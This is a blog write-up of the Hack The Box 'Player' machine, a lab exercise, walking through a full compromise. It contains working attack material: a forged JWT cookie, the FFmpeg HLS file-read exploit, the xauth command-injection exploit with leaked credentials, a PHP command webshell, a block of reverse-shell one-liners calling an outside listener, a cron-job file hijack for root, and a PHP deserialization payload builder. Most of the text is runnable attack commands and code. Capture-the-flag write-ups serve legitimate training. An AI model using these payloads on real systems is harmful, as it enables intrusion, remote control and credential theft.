hackthebox Player | Wh0ale's Blog
source link: https://wh0ale.github.io/2020/01/28/hackthebox-Player/
It is the fourth day of the Lunar New Year and I have already watched every boring movie there is. Spring Festival is way too boring..
recon
nmap -sV -sT -sC -o nmapinitial player.htb
Ports 80 (HTTP) and 22 (SSH) are open.
Web Enumeration
Visiting http://player.htb/ returns 403 Forbidden.
Enumerate virtual hosts with wfuzz and subdomains-top1million-5000.txt from SecLists, which gives the following results:
wfuzz --hc 403 -c -w subdomains-top1million-5000.txt -H "HOST: FUZZ.player.htb" http://10.10.10.145
Add the discovered names to /etc/hosts and visit the three subdomains in turn.
http://staging.player.htb/ has something interesting.
Submitting a message through the contact form on staging redirects to 501.php.
Looking at the response to the third request in the proxy history:
HTTP/1.1 200 OK
Date: Tue, 28 Jan 2020 09:14:59 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
refresh: 0;url=501.php
Vary: Accept-Encoding
Content-Length: 818
Connection: close
Content-Type: text/html
array(3) {
[0]=>
array(4) {
["file"]=>
string(28) "/var/www/staging/contact.php"
["line"]=>
int(6)
["function"]=>
string(1) "c"
["args"]=>
array(1) {
[0]=>
&string(9) "Cleveland"
}
}
[1]=>
array(4) {
["file"]=>
string(28) "/var/www/staging/contact.php"
["line"]=>
int(3)
["function"]=>
string(1) "b"
["args"]=>
array(1) {
[0]=>
&string(5) "Glenn"
}
}
[2]=>
array(4) {
["file"]=>
string(28) "/var/www/staging/contact.php"
["line"]=>
int(11)
["function"]=>
string(1) "a"
["args"]=>
array(1) {
[0]=>
&string(5) "Peter"
}
}
}
Database connection failed.<html><br />Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php
The response leaks three paths:
/var/www/staging/contact.php
/var/www/backup/service_config
/var/www/staging/fix.php
At http://chat.player.htb/ there is a chat log between Olla and Vincent. Olla asks him about a pentest report and he mentions two findings:
- staging exposes sensitive files.
- the main domain exposes source code, allowing access to the product before release.
Directory brute force against the main domain:
wfuzz --hc 404 -c -w /usr/share/wordlists/dirb/common.txt http://player.htb/FUZZ
000000001: 403 10 L 30 W 277 Ch ""
000000011: 403 10 L 30 W 281 Ch ".hta"
000000012: 403 10 L 30 W 286 Ch ".htaccess"
000000013: 403 10 L 30 W 286 Ch ".htpasswd"
000002250: 301 9 L 28 W 310 Ch "launcher"
000003588: 403 10 L 30 W 290 Ch "server-status"
Visit http://player.htb/launcher. Submitting the form auto-redirects to http://player.htb/launcher/dee8dc8a47256c64630d803a4c40786c.php?
From the chat we know the source code is exposed somewhere, and I wanted to read the source of http://player.htb/launcher/dee8dc8a47256c64630d803a4c40786e.php, so I tried the basics: appending .swp, .bak and ~ to the filename.
That revealed the key point: a JWT.
Decoding the cookie as a JWT shows its claims.
The leaked code means:
if the cookie verifies under HS256 and its access_code is "0E76658526655756207688271159624026011393", the server redirects to 7F2xxxxxxxxxxxxx/;
otherwise it redirects to index.html, the page we were just sent to.
So we need to forge a new cookie:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IjBFNzY2NTg1MjY2NTU3NTYyMDc2ODgyNzExNTk2MjQwMjYwMTEzOTMifQ.VXuTKqw__J4YgcgtOdNDgsLgrFjhN1_WwspYNf_FjyE
With the cookie changed, we land on the new page.
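To make the cookie check concrete, here is a short added example (my code, not from the post) of what it amounts to: the claims of a JWT are readable by anyone, and forging a token with the wanted access_code only needs the HS256 secret. That secret came from the leaked source, which the post shows only as a screenshot, so the key below is a hypothetical placeholder; the token and the access_code are the ones on this page, and the verify function shows the server-side check including the alg pin that such code should have.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Token and target claim copied from this page.
PAGE_TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
              "eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IjBFNzY2NTg1MjY2NTU3NTYyMDc2ODgyNzExNTk2MjQwMjYwMTEzOTMifQ."
              "VXuTKqw__J4YgcgtOdNDgsLgrFjhN1_WwspYNf_FjyE")
TARGET_CODE = "0E76658526655756207688271159624026011393"
# Hypothetical placeholder; the real secret is in the leaked source, not on this page.
SECRET = b"hypothetical-secret"


def _b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_jwt_unverified(token: str) -> Tuple[dict, dict]:
    """Return (header, payload) without checking the signature: the signature
    proves who minted the token, it does not hide the claims."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(payload_b64))


def forge_hs256(payload: dict, secret: bytes) -> str:
    """Mint an HS256 token for `payload`; compact JSON matches PHP's json_encode output."""
    header = {"typ": "JWT", "alg": "HS256"}
    signing_input = ".".join(
        _b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Server-side check: return the payload only if alg is pinned and the HMAC matches."""
    try:
        signing_input, sig_b64 = token.rsplit(".", 1)
        header, payload = decode_jwt_unverified(token)
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != "HS256":        # refuse 'none' / algorithm confusion
        return None
    expected = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    return payload


if __name__ == "__main__":
    header, claims = decode_jwt_unverified(PAGE_TOKEN)
    print(header, claims)
    forged = forge_hs256({"project": "PlayBuff", "access_code": TARGET_CODE}, SECRET)
    print(forged, verify_hs256(forged, SECRET))
```

Decoding the page's token needs no key at all, which is how the cookie's role was understood; minting one with the right access_code needs the key, and a wrong key fails verification.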
exploit
FFmpeg HLS vulnerability -> arbitrary file read
The new page has a file upload function.
After uploading a file a new button appears; inspecting it with F12 shows:
<a href="http:\/\/player.htb/launcher/7F2dcsSdZo6nj3SNMTQ1/uploads/1526724324.avi">Buffed Media</a>
Uploading files of other formats, the returned file is always of type avi, so the upload is being converted by ffmpeg.
So I tried the FFmpeg HLS exploit and created an AVI that reads /etc/passwd as a test; it works like this:
./gen_xbin_avi.py file:///etc/passwd test.avi
file test.avi
test.avi: RIFF (little-endian) data, AVI, 224 x 160, 25.00 fps,
After uploading, click Buffed Media to get the result.
Create AVIs that read the other leaked files:
./gen_xbin_avi.py file:///var/www/staging/contact.php contact.avi
./gen_xbin_avi.py file:///var/www/backup/service_config service_config.avi
./gen_xbin_avi.py file:///var/www/staging/fix.php fix.avi
contact.php has nothing interesting, the AVI for fix.php comes back empty, and service_config contains credentials for a user named telegen:
username: telegen
password: d-bC|jC!2uepS/w
Tried logging in at http://dev.player.htb/ with them: failed.
Tried SSH on port 22: failed.
Quick full-port scan with masscan:
masscan -p1-65535 10.10.10.145 --rate=1000 -e eth0
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-29 08:59:36 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.10.10.145
Discovered open port 80/tcp on 10.10.10.145
Discovered open port 6686/tcp on 10.10.10.145
rate: 0.00-kpps, 100.00% done, waiting -29-secs, found=3
nmap service detail for the new port:
nmap -p 6686 -sT -sV --version-all 10.10.10.145
Nmap scan report for player.htb (10.10.10.145)
Host is up (0.40s latency).
PORT STATE SERVICE VERSION
6686/tcp open tcpwrapped
Probing the port with nc:
~ # nc player.htb 6686
SSH-2.0-OpenSSH_7.2
So port 6686 is a second SSH server. Logging in there with telegen's credentials works, but the session does not allow executing commands.
The banner identifies it as OpenSSH 7.2 rather than Dropbear (the small SSH server and client common on embedded Linux such as wireless routers); the Dropbear write-up referenced below describes the same class of bug in that implementation.
xauth Command Injection
searchsploit shows an xauth command-injection exploit matching this OpenSSH version:
searchsploit openssh
OpenSSH 7.2p1 - (Authenticated) xauth Command Injection | exploits/multiple/remote/39569.py
python /usr/share/exploitdb/exploits/multiple/remote/39569.py player.htb 6686 telegen 'd-bC|jC!2uepS/w'
INFO:__main__:connecting to: telegen:d-bC|jC!2uepS/w@player.htb:6686
Reference: CVE-2016-3116 Dropbear injection vulnerability analysis (the OpenSSH counterpart exploited here is CVE-2016-3115, fixed in 7.2p2)
readfile: local file read
Use the exploit's .readfile command to read user.txt:
.readfile /etc/passwd
.readfile /home/telegen/user.txt
Writing a file to get a reverse shell failed:
.writefile /tmp/testfile1
thisisatestfile
Read the file that could not be read through the FFmpeg HLS bug:
#> .readfile /var/www/staging/fix.php
DEBUG:__main__:auth_cookie: 'xxxx\nsource /var/www/staging/fix.php\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:<?php
class [small test-harness class: protected counters, passed()/failed() helpers and echo wrappers; only the first token of each line survived extraction]
    public function [...] {
        if(!$username){
            $username [...]
            $password [...]
        }
        //modified
        //for
        //fix
        //peter
        //CQXpm\z)G5D#%S$y=
    }
    [remaining methods truncated in the extraction]
}
#>
The comment gives another set of credentials:
peter
CQXpm\z)G5D#%S$y=
Try logging in at http://dev.player.htb/ with peter's credentials.
Reverse shell
I tried to create a new file, but it did not work.
So I tried creating a new project to see whether files could be created inside it.
That failed too, so I created a project under /var/www/demo/home
and uploaded test.php,
and found that the same test.php is visible under the corresponding subdirectory of http://dev.player.htb/
wfuzz scan of http://dev.player.htb/:
wfuzz --hc 404 -c -w /usr/share/wordlists/dirb/common.txt http://dev.player.htb/FUZZ
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/components (Status: 301)
/data (Status: 301)
/favicon.ico (Status: 200)
/home (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/languages (Status: 301)
/lib (Status: 301)
/plugins (Status: 301)
/server-status (Status: 403)
/themes (Status: 301)
test.php is visible under the home directory,
so we can upload a webshell, shell.php:
<?php
// minimal command webshell: $_REQUEST takes the command from GET or POST
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);   // runs via /bin/sh as the web server user
    echo "</pre>";
    die;
}
?>
Requesting http://dev.player.htb/home/shell.php?cmd=id
shows the output of the executed command.
nc reverse shell one-liners (listener on 10.10.15.142:4444):
bash -i >& /dev/tcp/10.10.15.142/4444 0>&1
perl -e 'use Socket;$i="10.10.15.142";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.142",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.10.15.142",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.142 4444 >/tmp/f
Running the reverse shell command directly through the one-line webshell's parameter did not work, so I uploaded a full-featured webshell instead.
I was on my home network here, and the reverse shell lagged terribly.
Elevation
Download pspy with wget.
pspy is a command line tool designed to snoop on processes without needing root permissions. It lets you watch commands run by other users, cron jobs, etc. as they execute. Great for enumerating Linux systems in CTFs, and a good way to show your colleagues why passing secrets as command-line arguments is a bad idea.
Running pspy hit a couple of permission problems:
$ /tmp/pspy64s
/bin/sh: 8: /tmp/pspy64s: not found
$ cp /var/www/demo/pspy64s /tmp/pspy64s
$ /tmp/pspy64s
/bin/sh: 10: /tmp/pspy64s: Permission denied
$ chmod +x /tmp/pspy64s
$ /tmp/pspy64s
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
One line of its output is the important one:
2020/01/29 20:37:01 CMD: UID=0 PID=20002 | /usr/bin/php /var/lib/playbuff/buff.php
/var/lib/playbuff/buff.php
is executed as root by a cron job:
<?php
include("/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php");
class playBuff
{
public $logFile="/var/log/playbuff/logs.txt";
public $logData="Updated";
public function __wakeup()
{
file_put_contents(__DIR__."/".$this->logFile,$this->logData);
}
}
$buff = new playBuff();
$serialbuff = serialize($buff);
$data = file_get_contents("/var/lib/playbuff/merge.log");
if(unserialize($data))
{
$update = file_get_contents("/var/lib/playbuff/logs.txt");
$query = mysqli_query($conn, "update stats set status='$update' where id=1");
if($query)
{
echo 'Update Success with serialized logs!';
}
}
else
{
file_put_contents("/var/lib/playbuff/merge.log","no issues yet");
$update = file_get_contents("/var/lib/playbuff/logs.txt");
$query = mysqli_query($conn, "update stats set status='$update' where id=1");
if($query)
{
echo 'Update Success!';
}
}
?>
We cannot modify buff.php itself, but we can modify the file it includes, /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php:
<?php
$servername = "localhost";
$username = "root";
$password = "";
$dbname = "integrity";
// added hook: the root cron includes this file, so this runs as root.
// bash -c runs the path as a command, so /tmp/pwned.sh needs its execute bit.
system("bash -c /tmp/pwned.sh");
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
?>
Upload pwned.sh through http://dev.player.htb/, move it into place with cp,
then start a listener on Kali to catch the (root) reverse shell. pspy already shows the cron job executing bash -c /tmp/pwned.sh,
but I waited a long time and never got a shell back.
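A second root route is visible in buff.php itself and worth spelling out, as an added example (my code, not the post's): the script calls unserialize() on /var/lib/playbuff/merge.log, and playBuff::__wakeup() writes $logData to __DIR__ . "/" . $logFile, so whoever can write merge.log gets a root-privileged file write with path traversal. Whether merge.log is writable by the web user is not established on the page and is an assumption; the paths and the class layout are the ones in buff.php. The example builds the serialized object in PHP's format, resolves where __wakeup() would write, and shows the path check buff.php lacks.

```python
import posixpath

# Paths from buff.php on the page.
BUFF_DIR = "/var/lib/playbuff"
INCLUDED_FILE = "/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php"


def php_serialize_string(value: str) -> str:
    """PHP scalar string: s:<byte length>:"<value>";"""
    return f's:{len(value.encode("utf-8"))}:"{value}";'


def php_serialize_playbuff(log_file: str, log_data: str) -> str:
    """Serialized playBuff object with its two public properties (public
    properties serialize under their bare names; no accessors here)."""
    return (
        'O:8:"playBuff":2:{'
        + php_serialize_string("logFile") + php_serialize_string(log_file)
        + php_serialize_string("logData") + php_serialize_string(log_data)
        + "}"
    )


def wakeup_target_path(log_file: str, script_dir: str = BUFF_DIR) -> str:
    """Where __wakeup() writes: __DIR__ . "/" . $this->logFile, resolved.
    Even the class's own default (/var/log/playbuff/logs.txt) lands under
    __DIR__ because of the unconditional prefix."""
    return posixpath.normpath(script_dir + "/" + log_file)


def is_safe_log_path(log_file: str, allowed_dir: str = BUFF_DIR) -> bool:
    """The check buff.php lacks: reject any logFile that escapes the script's directory."""
    target = wakeup_target_path(log_file)
    return target.startswith(allowed_dir.rstrip("/") + "/")


# Constructed payload: traverse from BUFF_DIR up to the launcher file buff.php includes,
# so the root cron overwrites it with logData and executes that on its next run.
TRAVERSAL = "../../www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php"
PAYLOAD = php_serialize_playbuff(TRAVERSAL, "<?php system('/bin/bash /tmp/pwned.sh'); ?>")

if __name__ == "__main__":
    print(PAYLOAD)
    print(wakeup_target_path(TRAVERSAL), is_safe_log_path(TRAVERSAL))
```

The fix on the PHP side is the same as the check above: resolve the path with realpath() and refuse anything outside the intended directory, or better, never unserialize() data the web user can write (json_decode with a fixed schema does the job).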